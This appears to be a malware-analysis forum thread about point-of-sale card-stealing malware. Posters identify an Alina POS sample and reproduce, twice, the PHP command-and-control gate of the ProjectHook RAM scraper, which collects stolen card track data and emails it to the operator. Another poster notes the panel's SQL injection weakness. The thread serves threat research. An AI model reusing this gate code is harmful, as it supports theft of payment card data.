A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #29424  by EP_X0FF
 Sun Oct 16, 2016 7:21 am
ikolor wrote:next ..
https://www.virustotal.com/en/file/2b36 ... 457283940/
This is Alina POS, in attach unpacked. Posts moved.

Unpacked VT
https://www.virustotal.com/en/file/8b90 ... 476602306/
Attachments
pass: infected
(63.31 KiB) Downloaded 67 times
 #29475  by benkow_
 Sun Oct 23, 2016 4:22 pm
ProjectHook RAM scraper seems to be alive (thx to xylitol)
I cannot found any malware sample but attached the source code of the new panel
Image

new gate rxcx.php:
Code: Select all
<?php
//$email = "XXXX@XXXX.XXX";
$email = "XXXX@XXXX.XX";
$headers  = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: dump@db.com\r\n";

include "db.php";


function getUserIP()
{
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];

    if(filter_var($client, FILTER_VALIDATE_IP))
    {
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP))
    {
        $ip = $forward;
    }
    else
    {
        $ip = $remote;
    }

    return $ip;
}


$user_ip = getUserIP();

// Initialize ExtendedAddslash() function for every $_POST variable

$byte = $_POST['BYTE'];
$data = $_POST['DATA'];
$id = $_POST['ID'];
$proc = $_POST['PROC'];
$track1 = $_POST['T1'];
$track2 = $_POST['T2'];


// search submission ID

$query = "SELECT * FROM `hook` WHERE `submission_id` = '$id'";
$sqlsearch = mysql_query($query);
$resultcount = mysql_numrows($sqlsearch);

if ($resultcount > 0) {
 
    mysql_query("UPDATE `hook` SET
                                `ip` = '$user_ip',
                                `t1` = '$track1',
                                `t2` = '$track2',
                                `data` = '$data',
                                `proc` = '$proc',       
                                `byte` = '$byte'
                             WHERE `submission_id` = '$id'")
     or die(mysql_error());
   
} else {

    mysql_query("INSERT INTO `hook` (ip, data, id,
                                                                          byte, proc, t1, t2)
                               VALUES ('$user_ip', '$data', '$id',
                                                 '$byte', '$proc', '$track1', '$track2') ")
    or die(mysql_error()); 

}
mail($email, "New Data: $user_ip : $data : $proc : $track1 : $track2", "ip: $user_ip<br>track1: $track1<br>track2: $track2<br>data: $data<br>proc: $proc", $headers);
?>
Attachments
infected
(6.26 KiB) Downloaded 64 times
 #29476  by p1nk
 Mon Oct 24, 2016 1:39 am
Looks like they didn't learn to properly handle user input:
Code: Select all
  // Create query
  $q = "SELECT * FROM `dbUsers` WHERE `username`='".$_POST["username"]."' AND `password`='".$_POST["password"]."' LIMIT 1";
  // Run query
  $r = mysql_query($q);
 #29477  by Bogdan-Mihai
 Mon Oct 24, 2016 8:25 am
benkow_ wrote:ProjectHook RAM scraper seems to be alive (thx to xylitol)
I cannot found any malware sample but attached the source code of the new panel
Image

new gate rxcx.php:
Code: Select all
<?php
//$email = "XXXX@XXXX.XXX";
$email = "XXXX@XXXX.XX";
$headers  = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: dump@db.com\r\n";

include "db.php";


function getUserIP()
{
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];

    if(filter_var($client, FILTER_VALIDATE_IP))
    {
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP))
    {
        $ip = $forward;
    }
    else
    {
        $ip = $remote;
    }

    return $ip;
}


$user_ip = getUserIP();

// Initialize ExtendedAddslash() function for every $_POST variable

$byte = $_POST['BYTE'];
$data = $_POST['DATA'];
$id = $_POST['ID'];
$proc = $_POST['PROC'];
$track1 = $_POST['T1'];
$track2 = $_POST['T2'];


// search submission ID

$query = "SELECT * FROM `hook` WHERE `submission_id` = '$id'";
$sqlsearch = mysql_query($query);
$resultcount = mysql_numrows($sqlsearch);

if ($resultcount > 0) {
 
    mysql_query("UPDATE `hook` SET
                                `ip` = '$user_ip',
                                `t1` = '$track1',
                                `t2` = '$track2',
                                `data` = '$data',
                                `proc` = '$proc',       
                                `byte` = '$byte'
                             WHERE `submission_id` = '$id'")
     or die(mysql_error());
   
} else {

    mysql_query("INSERT INTO `hook` (ip, data, id,
                                                                          byte, proc, t1, t2)
                               VALUES ('$user_ip', '$data', '$id',
                                                 '$byte', '$proc', '$track1', '$track2') ")
    or die(mysql_error()); 

}
mail($email, "New Data: $user_ip : $data : $proc : $track1 : $track2", "ip: $user_ip<br>track1: $track1<br>track2: $track2<br>data: $data<br>proc: $proc", $headers);
?>
Looks like the author or someone who edited the php files is Romanian - some strings from failed login indicate that.
  • 1
  • 21
  • 22
  • 23
  • 24
  • 25